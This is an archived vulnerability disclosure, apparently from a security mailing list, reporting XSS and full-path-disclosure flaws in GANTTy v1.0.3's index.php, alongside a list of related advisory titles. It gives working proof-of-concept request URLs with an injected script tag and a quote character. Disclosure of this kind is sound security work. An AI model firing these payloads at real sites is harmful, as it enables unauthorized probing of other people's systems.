Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) Calendar Express 2 SQL injection [SA20465] Coppermine Photo Gallery usermgr.php Unspecified Vulnerability [SA20475] MiraksGalerie Multiple File Inclusion Vulnerabilities [SA20436] PyBlosxom Contributed Packages Cross-Site Scripting Vulnerability From:luny_(at)_youfucktard.com <luny_(at)_youfucktard.com> Date:07.06.2006Subject:GANTTy v1.0.3GANTTy v1.0.3 Homepage: http://www.gantty.com Effected files: index.php XSS Vulnerabilities PoC: XSS Vulnerability: http://www.example.com/index.php?action=login&message=<IMG SRC=javascript:alert('XSS')>+email&lang= Full path disclosure error: http://www.example.com/index.php?action=authenticate&lang=' Error: FILE /var/www/username/actions/authenticate.php
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Calendar Express 2 SQL injection
[SA20465] Coppermine Photo Gallery usermgr.php Unspecified Vulnerability
[SA20475] MiraksGalerie Multiple File Inclusion Vulnerabilities
[SA20436] PyBlosxom Contributed Packages Cross-Site Scripting Vulnerability
